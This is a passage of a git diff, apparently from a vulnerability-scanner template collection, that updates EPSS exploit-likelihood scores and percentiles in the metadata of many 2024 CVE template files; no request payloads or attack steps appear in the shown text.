b/http/cves/2024/CVE-2024-45388.yaml index 81788d84e86..9c54f9f02ea 100644 --- a/http/cves/2024/CVE-2024-45388.yaml +++ b/http/cves/2024/CVE-2024-45388.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-45388 cwe-id: CWE-20 epss-score: 0.93585 - epss-percentile: 0.99823 + epss-percentile: 0.99824 metadata: max-request: 1 verified: true diff --git a/http/cves/2024/CVE-2024-45440.yaml b/http/cves/2024/CVE-2024-45440.yaml index 10f79f44154..a2d649dce5b 100644 --- a/http/cves/2024/CVE-2024-45440.yaml +++ b/http/cves/2024/CVE-2024-45440.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2024-45440 cwe-id: CWE-209 - epss-score: 0.84523 - epss-percentile: 0.99295 + epss-score: 0.86443 + epss-percentile: 0.99388 cpe: cpe:2.3:a:drupal:drupal:2023-05-09:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-45507.yaml b/http/cves/2024/CVE-2024-45507.yaml index 025bfa82566..61aaf45ddae 100644 --- a/http/cves/2024/CVE-2024-45507.yaml +++ b/http/cves/2024/CVE-2024-45507.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2024-45507 cwe-id: CWE-918 epss-score: 0.90476 - epss-percentile: 0.99587 + epss-percentile: 0.99585 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: vendor: apache diff --git a/http/cves/2024/CVE-2024-45622.yaml b/http/cves/2024/CVE-2024-45622.yaml index cb4abd6914c..95fa6586ace 100644 --- a/http/cves/2024/CVE-2024-45622.yaml +++ b/http/cves/2024/CVE-2024-45622.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-45622 cwe-id: CWE-89 epss-score: 0.53363 - epss-percentile: 0.97888 + epss-percentile: 0.97884 cpe: cpe:2.3:a:asis:asis:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 7acbcf794c2..384eb3e5bbd 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-4577 cwe-id: CWE-78 - epss-score: 0.94374 - epss-percentile: 0.99962 + epss-score: 0.9441 + epss-percentile: 0.99975 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-46506.yaml b/http/cves/2024/CVE-2024-46506.yaml index 6a7909a76ea..3c82f04531e 100644 --- a/http/cves/2024/CVE-2024-46506.yaml +++ b/http/cves/2024/CVE-2024-46506.yaml @@ -15,8 +15,8 @@ info: cvss-score: 10 cve-id: CVE-2024-46506 cwe-id: CWE-306 - epss-score: 0.80759 - epss-percentile: 0.99099 + epss-score: 0.82131 + epss-percentile: 0.99177 cpe: cpe:2.3:a:netalertx:netalertx:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-46627.yaml b/http/cves/2024/CVE-2024-46627.yaml index b44db1f7c67..8af1b2760bb 100644 --- a/http/cves/2024/CVE-2024-46627.yaml +++ b/http/cves/2024/CVE-2024-46627.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-46627 cwe-id: CWE-284 epss-score: 0.91036 - epss-percentile: 0.99619 + epss-percentile: 0.99617 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-47073.yaml b/http/cves/2024/CVE-2024-47073.yaml index fc63f27a6eb..6efc79c2a2a 100644 --- a/http/cves/2024/CVE-2024-47073.yaml +++ b/http/cves/2024/CVE-2024-47073.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-47073 cwe-id: CWE-347 epss-score: 0.49743 - epss-percentile: 0.97718 + epss-percentile: 0.97713 cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-47308.yaml b/http/cves/2024/CVE-2024-47308.yaml index f6f641f2f5a..49aac8f2507 100644 --- a/http/cves/2024/CVE-2024-47308.yaml +++ b/http/cves/2024/CVE-2024-47308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-47308 cwe-id: CWE-862 epss-score: 0.40912 - epss-percentile: 0.97254 + epss-percentile: 0.97252 cpe: cpe:2.3:a:templately:templately:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-47533.yaml b/http/cves/2024/CVE-2024-47533.yaml index 396dfe831eb..18e3ca0d29f 100644 --- a/http/cves/2024/CVE-2024-47533.yaml +++ b/http/cves/2024/CVE-2024-47533.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-47533 cwe-id: CWE-287 epss-score: 0.68594 - epss-percentile: 0.98559 + epss-percentile: 0.9856 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-4836.yaml b/http/cves/2024/CVE-2024-4836.yaml index 9f5509f7463..c70a9776e2a 100644 --- a/http/cves/2024/CVE-2024-4836.yaml +++ b/http/cves/2024/CVE-2024-4836.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-4836 classification: epss-score: 0.4491 - epss-percentile: 0.97472 + epss-percentile: 0.97469 metadata: max-request: 5 fofa-query: icon_hash="1491301339" diff --git a/http/cves/2024/CVE-2024-4841.yaml b/http/cves/2024/CVE-2024-4841.yaml index 7b247fc01ef..afb180cceb9 100644 --- a/http/cves/2024/CVE-2024-4841.yaml +++ b/http/cves/2024/CVE-2024-4841.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-4841 cwe-id: CWE-29 epss-score: 0.09339 - epss-percentile: 0.92522 + epss-percentile: 0.92516 metadata: max-request: 1 fofa-query: "LoLLMS WebUI - Welcome" diff --git a/http/cves/2024/CVE-2024-48455.yaml b/http/cves/2024/CVE-2024-48455.yaml index 1d7165001ce..278024a12e7 100644 --- a/http/cves/2024/CVE-2024-48455.yaml +++ b/http/cves/2024/CVE-2024-48455.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-48455 cwe-id: CWE-200 epss-score: 0.52418 - epss-percentile: 0.97839 + epss-percentile: 0.97836 metadata: max-request: 1 fofa-query: title="Netis" diff --git a/http/cves/2024/CVE-2024-4940.yaml b/http/cves/2024/CVE-2024-4940.yaml index 09e55512591..62b11e19341 100644 --- a/http/cves/2024/CVE-2024-4940.yaml +++ b/http/cves/2024/CVE-2024-4940.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-4940 cwe-id: CWE-601 epss-score: 0.07236 - epss-percentile: 0.91361 + epss-percentile: 0.9136 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-49757.yaml b/http/cves/2024/CVE-2024-49757.yaml index de7e9a334d2..c5cdef6b0a0 100644 --- a/http/cves/2024/CVE-2024-49757.yaml +++ b/http/cves/2024/CVE-2024-49757.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-49757 cwe-id: CWE-287 epss-score: 0.0872 - epss-percentile: 0.92242 + epss-percentile: 0.92236 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-50334.yaml b/http/cves/2024/CVE-2024-50334.yaml index baf94b4bffd..f1b9bbc3d3a 100644 --- a/http/cves/2024/CVE-2024-50334.yaml +++ b/http/cves/2024/CVE-2024-50334.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-50334 cwe-id: CWE-288 epss-score: 0.07703 - epss-percentile: 0.91654 + epss-percentile: 0.91653 cpe: cpe:2.3:a:erudika:scoold:*:*:*:*:*:*:*:* metadata: vendor: erudika diff --git a/http/cves/2024/CVE-2024-50477.yaml b/http/cves/2024/CVE-2024-50477.yaml index b252bec8505..99bc9fc20bd 100644 --- a/http/cves/2024/CVE-2024-50477.yaml +++ b/http/cves/2024/CVE-2024-50477.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-50477 cwe-id: CWE-288,CWE-306 epss-score: 0.82532 - epss-percentile: 0.99199 + epss-percentile: 0.99201 cpe: cpe:2.3:a:stacksmarket:stacks_mobile_app_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-5057.yaml b/http/cves/2024/CVE-2024-5057.yaml index 6480006ee84..acdaa992f29 100644 --- a/http/cves/2024/CVE-2024-5057.yaml +++ b/http/cves/2024/CVE-2024-5057.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-5057 - epss-score: 0.52994 - epss-percentile: 0.97866 + epss-score: 0.55209 + epss-percentile: 0.97975 cwe-id: CWE-89 cpe: cpe:2.3:a:awesomemotive:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2024/CVE-2024-5082.yaml b/http/cves/2024/CVE-2024-5082.yaml index cdda9b1d4b9..0afcfdd410d 100644 --- a/http/cves/2024/CVE-2024-5082.yaml +++ b/http/cves/2024/CVE-2024-5082.yaml @@ -15,7 +15,7 @@ info: - https://support.sonatype.com/hc/en-us/articles/30694125380755 classification: epss-score: 0.04785 - epss-percentile: 0.89157 + epss-percentile: 0.89155 metadata: verified: true max-request: 3 diff --git a/http/cves/2024/CVE-2024-5084.yaml b/http/cves/2024/CVE-2024-5084.yaml index 3aa2fcba289..33ec4e40c7a 100644 --- a/http/cves/2024/CVE-2024-5084.yaml +++ b/http/cves/2024/CVE-2024-5084.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2024-5084 epss-score: 0.92524 - epss-percentile: 0.99726 + epss-percentile: 0.99725 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-50857.yaml b/http/cves/2024/CVE-2024-50857.yaml index 3d837b70941..10bd842653e 100644 --- a/http/cves/2024/CVE-2024-50857.yaml +++ b/http/cves/2024/CVE-2024-50857.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-50857 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.22783 + epss-percentile: 0.22726 cpe: cpe:2.3:a:gestioip:gestioip:3.5.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-51228.yaml b/http/cves/2024/CVE-2024-51228.yaml index 7f19b7c70c3..56502e08cdc 100644 --- a/http/cves/2024/CVE-2024-51228.yaml +++ b/http/cves/2024/CVE-2024-51228.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-51228 cwe-id: CWE-78 epss-score: 0.55156 - epss-percentile: 0.97975 + epss-percentile: 0.97972 metadata: max-request: 1 shodan-query: html:"TOTOLINK" diff --git a/http/cves/2024/CVE-2024-51378.yaml b/http/cves/2024/CVE-2024-51378.yaml index f8c230b7cf8..8679c11aa02 100644 --- a/http/cves/2024/CVE-2024-51378.yaml +++ b/http/cves/2024/CVE-2024-51378.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-51378 cwe-id: CWE-78 epss-score: 0.93851 - epss-percentile: 0.9986 + epss-percentile: 0.99859 cpe: cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-51482.yaml b/http/cves/2024/CVE-2024-51482.yaml index a0373330c30..b068019fdff 100644 --- a/http/cves/2024/CVE-2024-51482.yaml +++ b/http/cves/2024/CVE-2024-51482.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-51482 cwe-id: CWE-89 epss-score: 0.54825 - epss-percentile: 0.97959 + epss-percentile: 0.97957 cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2024/CVE-2024-51739.yaml b/http/cves/2024/CVE-2024-51739.yaml index 3279b12b2d4..5cc69dfc42c 100644 --- a/http/cves/2024/CVE-2024-51739.yaml +++ b/http/cves/2024/CVE-2024-51739.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-51739 cwe-id: CWE-200 epss-score: 0.26771 - epss-percentile: 0.96191 + epss-percentile: 0.96194 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-51978.yaml b/http/cves/2024/CVE-2024-51978.yaml index 128c7ad9fc7..da77c3a8fea 100644 --- a/http/cves/2024/CVE-2024-51978.yaml +++ b/http/cves/2024/CVE-2024-51978.yaml @@ -17,7 +17,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-51978 classification: epss-score: 0.48343 - epss-percentile: 0.97644 + epss-percentile: 0.97639 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-51978 diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index 2ce6375c476..4840a706a51 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -17,7 +17,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-5217 classification: epss-score: 0.94108 - epss-percentile: 0.99904 + epss-percentile: 0.99903 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml index 507232b5eba..5557940215e 100644 --- a/http/cves/2024/CVE-2024-5230.yaml +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-5230 cwe-id: CWE-200 epss-score: 0.36319 - epss-percentile: 0.96982 + epss-percentile: 0.96981 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-52762.yaml b/http/cves/2024/CVE-2024-52762.yaml index 18fadade9cd..dca831ed36e 100644 --- a/http/cves/2024/CVE-2024-52762.yaml +++ b/http/cves/2024/CVE-2024-52762.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2024-52762 cwe-id: CWE-79 epss-score: 0.00336 - epss-percentile: 0.55864 + epss-percentile: 0.55857 cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-52763.yaml b/http/cves/2024/CVE-2024-52763.yaml index 431a11a704e..6cf83111cf1 100644 --- a/http/cves/2024/CVE-2024-52763.yaml +++ b/http/cves/2024/CVE-2024-52763.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-52763 cwe-id: CWE-79 epss-score: 0.00326 - epss-percentile: 0.55057 + epss-percentile: 0.55048 cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:* metadata: vendor: ganglia diff --git a/http/cves/2024/CVE-2024-5315.yaml b/http/cves/2024/CVE-2024-5315.yaml index 173fcaaa506..18f583d2cfa 100644 --- a/http/cves/2024/CVE-2024-5315.yaml +++ b/http/cves/2024/CVE-2024-5315.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2024-5315 cwe-id: CWE-89 - epss-score: 0.53695 - epss-percentile: 0.97906 + epss-score: 0.56851 + epss-percentile: 0.98048 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-5334.yaml b/http/cves/2024/CVE-2024-5334.yaml index 3dc9981da8a..ffb29097813 100644 --- a/http/cves/2024/CVE-2024-5334.yaml +++ b/http/cves/2024/CVE-2024-5334.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-5334 cwe-id: CWE-73 epss-score: 0.6275 - epss-percentile: 0.98313 + epss-percentile: 0.98314 metadata: max-request: 1 shodan-query: title:"Devika AI" diff --git a/http/cves/2024/CVE-2024-53991.yaml b/http/cves/2024/CVE-2024-53991.yaml index d3c38093004..baad8afe6b8 100644 --- a/http/cves/2024/CVE-2024-53991.yaml +++ b/http/cves/2024/CVE-2024-53991.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2024-53991 cwe-id: CWE-200 - epss-score: 0.38334 - epss-percentile: 0.97106 + epss-score: 0.37251 + epss-percentile: 0.97044 metadata: shodan-query: http.component:"Discourse" tags: cve,cve2024,discourse,disclosure,vuln diff --git a/http/cves/2024/CVE-2024-53995.yaml b/http/cves/2024/CVE-2024-53995.yaml index 22af096a892..c9801bb96e2 100644 --- a/http/cves/2024/CVE-2024-53995.yaml +++ b/http/cves/2024/CVE-2024-53995.yaml @@ -22,8 +22,8 @@ info: cvss-score: 4.7 cve-id: CVE-2024-53995 cwe-id: CWE-601 - epss-score: 0.00425 - epss-percentile: 0.61696 + epss-score: 0.00474 + epss-percentile: 0.64159 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-5421.yaml b/http/cves/2024/CVE-2024-5421.yaml index e10986c121c..a26fcaab1e4 100644 --- a/http/cves/2024/CVE-2024-5421.yaml +++ b/http/cves/2024/CVE-2024-5421.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.7 cve-id: CVE-2024-5421 cwe-id: CWE-78 - epss-score: 0.23759 - epss-percentile: 0.95825 + epss-score: 0.25635 + epss-percentile: 0.96071 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-54330.yaml b/http/cves/2024/CVE-2024-54330.yaml index 3de995f9cba..47c74412920 100644 --- a/http/cves/2024/CVE-2024-54330.yaml +++ b/http/cves/2024/CVE-2024-54330.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-54330 cwe-id: CWE-918 epss-score: 0.56017 - epss-percentile: 0.98016 + epss-percentile: 0.98014 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-54763.yaml b/http/cves/2024/CVE-2024-54763.yaml index 37507ec6efc..d003f1921fc 100644 --- a/http/cves/2024/CVE-2024-54763.yaml +++ b/http/cves/2024/CVE-2024-54763.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-54763 cwe-id: CWE-284 epss-score: 0.02417 - epss-percentile: 0.84715 + epss-percentile: 0.84712 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-54764.yaml b/http/cves/2024/CVE-2024-54764.yaml index 34e299255d7..fa1d9e1bdb2 100644 --- a/http/cves/2024/CVE-2024-54764.yaml +++ b/http/cves/2024/CVE-2024-54764.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-54764 cwe-id: CWE-284 epss-score: 0.04067 - epss-percentile: 0.88214 + epss-percentile: 0.88216 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-54767.yaml b/http/cves/2024/CVE-2024-54767.yaml index bf7f136fea4..8a1f21f928a 100644 --- a/http/cves/2024/CVE-2024-54767.yaml +++ b/http/cves/2024/CVE-2024-54767.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-54767 cwe-id: CWE-203 epss-score: 0.0401 - epss-percentile: 0.88122 + epss-percentile: 0.88125 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-55218.yaml b/http/cves/2024/CVE-2024-55218.yaml index 6d7fb0e61be..e26cc6f7266 100644 --- a/http/cves/2024/CVE-2024-55218.yaml +++ b/http/cves/2024/CVE-2024-55218.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-55218 cwe-id: CWE-79 epss-score: 0.00269 - epss-percentile: 0.50065 + epss-percentile: 0.5004 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-55416.yaml b/http/cves/2024/CVE-2024-55416.yaml index 8ec92b86948..eb72b0f33a5 100644 --- a/http/cves/2024/CVE-2024-55416.yaml +++ b/http/cves/2024/CVE-2024-55416.yaml @@ -19,7 +19,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N cve-id: CVE-2024-55416 epss-score: 0.0024 - epss-percentile: 0.47139 + epss-percentile: 0.47113 metadata: verified: true max-request: 4 diff --git a/http/cves/2024/CVE-2024-55550.yaml b/http/cves/2024/CVE-2024-55550.yaml index fcff9b3f92e..1ac4ae674b2 100644 --- a/http/cves/2024/CVE-2024-55550.yaml +++ b/http/cves/2024/CVE-2024-55550.yaml @@ -15,8 +15,8 @@ info: - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/ - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029 classification: - epss-score: 0.08493 - epss-percentile: 0.92102 + epss-score: 0.11982 + epss-percentile: 0.93551 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-55591.yaml b/http/cves/2024/CVE-2024-55591.yaml index cac742cc0ea..bebc91f7488 100644 --- a/http/cves/2024/CVE-2024-55591.yaml +++ b/http/cves/2024/CVE-2024-55591.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-55591 cwe-id: CWE-288,NVD-CWE-Other - epss-score: 0.93661 - epss-percentile: 0.99833 + epss-score: 0.94114 + epss-percentile: 0.99904 cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-55956.yaml b/http/cves/2024/CVE-2024-55956.yaml index 1ae77cfaa22..e1adf22e6eb 100644 --- a/http/cves/2024/CVE-2024-55956.yaml +++ b/http/cves/2024/CVE-2024-55956.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-55956 cwe-id: CWE-276 - epss-score: 0.91828 - epss-percentile: 0.99672 + epss-score: 0.91203 + epss-percentile: 0.99629 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-56159.yaml b/http/cves/2024/CVE-2024-56159.yaml index 2b892159095..810b54cf812 100644 --- a/http/cves/2024/CVE-2024-56159.yaml +++ b/http/cves/2024/CVE-2024-56159.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-56159 - epss-score: 0.01127 - epss-percentile: 0.77846 + epss-score: 0.0121 + epss-percentile: 0.78569 cwe-id: CWE-219 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-56325.yaml b/http/cves/2024/CVE-2024-56325.yaml index 614c5c0549f..24cb1364c29 100644 --- a/http/cves/2024/CVE-2024-56325.yaml +++ b/http/cves/2024/CVE-2024-56325.yaml @@ -16,8 +16,8 @@ info: - https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v - http://www.openwall.com/lists/oss-security/2025/03/27/8 classification: - epss-score: 0.13121 - epss-percentile: 0.93899 + epss-score: 0.14936 + epss-percentile: 0.94338 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-56512.yaml b/http/cves/2024/CVE-2024-56512.yaml index 9f6b521f241..af74315d0c6 100644 --- a/http/cves/2024/CVE-2024-56512.yaml +++ b/http/cves/2024/CVE-2024-56512.yaml @@ -18,7 +18,7 @@ info: classification: cve-id: CVE-2024-56512 epss-score: 0.23924 - epss-percentile: 0.95846 + epss-percentile: 0.9585 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-57045.yaml b/http/cves/2024/CVE-2024-57045.yaml index 1f0c2379f82..f89d66717bd 100644 --- a/http/cves/2024/CVE-2024-57045.yaml +++ b/http/cves/2024/CVE-2024-57045.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-57045 cwe-id: CWE-200 epss-score: 0.74502 - epss-percentile: 0.98804 + epss-percentile: 0.98802 metadata: max-request: 1 verified: true diff --git a/http/cves/2024/CVE-2024-57049.yaml b/http/cves/2024/CVE-2024-57049.yaml index 5d4e1b1ffe5..a7dbf39db5f 100644 --- a/http/cves/2024/CVE-2024-57049.yaml +++ b/http/cves/2024/CVE-2024-57049.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-57049 cwe-id: CWE-287 epss-score: 0.4878 - epss-percentile: 0.97667 + epss-percentile: 0.97663 metadata: max-request: 1 verified: true diff --git a/http/cves/2024/CVE-2024-57514.yaml b/http/cves/2024/CVE-2024-57514.yaml index d1040886e38..c5cbccbed9a 100644 --- a/http/cves/2024/CVE-2024-57514.yaml +++ b/http/cves/2024/CVE-2024-57514.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-57514 cwe-id: CWE-79 epss-score: 0.13596 - epss-percentile: 0.94024 + epss-percentile: 0.94019 metadata: max-request: 1 vendor: tp-link diff --git a/http/cves/2024/CVE-2024-57727.yaml b/http/cves/2024/CVE-2024-57727.yaml index 4478bbfff44..88a4f17cc48 100644 --- a/http/cves/2024/CVE-2024-57727.yaml +++ b/http/cves/2024/CVE-2024-57727.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-57727 cwe-id: CWE-22 epss-score: 0.93845 - epss-percentile: 0.99858 + epss-percentile: 0.99857 cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-58136.yaml b/http/cves/2024/CVE-2024-58136.yaml index 5739b89a057..684616e2916 100644 --- a/http/cves/2024/CVE-2024-58136.yaml +++ b/http/cves/2024/CVE-2024-58136.yaml @@ -14,8 +14,8 @@ info: - https://infosecwriteups.com/from-behaviors-to-shells-yii2-php-framework-rce-cve-2024-58136-exploit-and-mitigation-e47a60a3cecb - https://nvd.nist.gov/vuln/detail/CVE-2024-58136 classification: - epss-score: 0.78443 - epss-percentile: 0.98987 + epss-score: 0.62133 + epss-percentile: 0.98288 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-58136 diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index f8d5af08332..f73006e97b5 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.3 cwe-id: CWE-306 epss-score: 0.91029 - epss-percentile: 0.99619 + epss-percentile: 0.99617 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-5932.yaml b/http/cves/2024/CVE-2024-5932.yaml index d22a91b839d..9c8438fc471 100644 --- a/http/cves/2024/CVE-2024-5932.yaml +++ b/http/cves/2024/CVE-2024-5932.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-5932 cwe-id: CWE-502 - epss-score: 0.94126 - epss-percentile: 0.99906 + epss-score: 0.9409 + epss-percentile: 0.999 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-5936.yaml b/http/cves/2024/CVE-2024-5936.yaml index c348f4cf975..40db572ee21 100644 --- a/http/cves/2024/CVE-2024-5936.yaml +++ b/http/cves/2024/CVE-2024-5936.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.3 cve-id: CVE-2024-5936 cwe-id: CWE-601 - epss-score: 0.00647 - epss-percentile: 0.70242 + epss-score: 0.02692 + epss-percentile: 0.85446 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-5947.yaml b/http/cves/2024/CVE-2024-5947.yaml index 6a097282ed2..67ff709a570 100644 --- a/http/cves/2024/CVE-2024-5947.yaml +++ b/http/cves/2024/CVE-2024-5947.yaml @@ -16,7 +16,7 @@ info: - https://www.zerodayinitiative.com/advisories/ZDI-24-671/ classification: epss-score: 0.74043 - epss-percentile: 0.98784 + epss-percentile: 0.98783 metadata: verified: "true" max-request: 1 diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml index 22b525e094f..eaeaa25293e 100644 --- a/http/cves/2024/CVE-2024-6028.yaml +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-6028 cwe-id: CWE-89 epss-score: 0.80299 - epss-percentile: 0.99079 + epss-percentile: 0.9908 cpe: cpe:2.3:a:ays-pro:quiz_maker:*:*:*:*:wordpress:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-6049.yaml b/http/cves/2024/CVE-2024-6049.yaml index 1fb28876699..0c8343adb44 100644 --- a/http/cves/2024/CVE-2024-6049.yaml +++ b/http/cves/2024/CVE-2024-6049.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-6049 cwe-id: CWE-32 epss-score: 0.68338 - epss-percentile: 0.98545 + epss-percentile: 0.98547 metadata: max-request: 2 tags: cve,cve2024,lawo,vtimesync,lfi,vuln diff --git a/http/cves/2024/CVE-2024-6159.yaml b/http/cves/2024/CVE-2024-6159.yaml index cb413e4ae92..aeee1faf9e8 100644 --- a/http/cves/2024/CVE-2024-6159.yaml +++ b/http/cves/2024/CVE-2024-6159.yaml @@ -18,7 +18,7 @@ info: cvss-score: 10 cve-id: CVE-2024-6159 epss-score: 0.09844 - epss-percentile: 0.92754 + epss-percentile: 0.92749 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml index d1154af5ba5..8b3093127f1 100644 --- a/http/cves/2024/CVE-2024-6289.yaml +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -16,7 +16,7 @@ info: - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/ classification: epss-score: 0.07883 - epss-percentile: 0.9176 + epss-percentile: 0.91757 metadata: 